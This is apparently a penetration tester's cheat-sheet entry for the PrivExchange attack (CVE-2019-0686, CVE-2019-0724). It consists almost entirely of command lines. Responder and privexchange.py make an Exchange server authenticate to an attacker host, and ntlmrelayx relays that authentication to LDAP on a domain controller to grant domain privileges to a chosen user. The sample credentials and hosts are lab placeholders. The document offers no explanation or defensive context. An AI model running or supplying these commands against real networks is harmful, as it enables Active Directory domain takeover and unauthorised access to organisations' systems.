PrivExchange

CVE-2019-0686, CVE-2019-0724

Check:

$ sudo ./Responder.py -I eth0 -Av
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 --attacker-page '/test/test/test' exch01.megacorp.local --debug

Exploit:

$ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 exch01.megacorp.local --debug
